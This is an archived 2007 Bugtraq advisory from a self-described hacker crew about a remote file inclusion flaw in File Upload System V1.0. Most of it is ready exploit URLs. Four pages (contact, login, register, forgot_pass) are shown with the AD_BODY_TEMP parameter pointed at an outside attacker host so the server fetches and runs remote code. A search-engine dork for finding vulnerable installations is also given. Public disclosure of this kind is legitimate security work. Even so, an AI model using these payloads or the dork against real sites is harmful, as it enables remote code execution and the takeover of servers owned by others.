| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 24 Mar 2007 15:07:17 -0000 From: ngevedBangetAsli@...hyesah.org To: bugtraq@...urityfocus.com Subject: File Upload System V1.0 (AD_BODY_TEMP) multiple file include ============================ HItamputih Crew ==================== # hitamputih Advisory # Discovered By : IbnuSina & jipank #----------------------------------------------------------- # Software: File Upload System V1.0 # Script Demo: http://demo.free-php-scripts.net/File_Upload # Method: file inclusion # Thanks To : akukasih,nyubi,irvian,BlueSpy,kurt_kabayan and all #hitamputih crew [[Exploitz]]--------------------------------------------------------- ?php include($AD_BODY_TEMP);?> exploit : http://target.com/[PATH]/contact.php?AD_BODY_TEMP=http://injekan.lu http://target.com/[PATH]/login.php?AD_BODY_TEMP=http://injekan.lu http://target.com/[PATH]/register.php?AD_BODY_TEMP=http://injekan.lu http://target.com/[PATH]/forgot_pass.php?AD_BODY_TEMP=http://injekan.lu gugel dork : intext:"Marsal Design Co."
Powered by blists - more mailing lists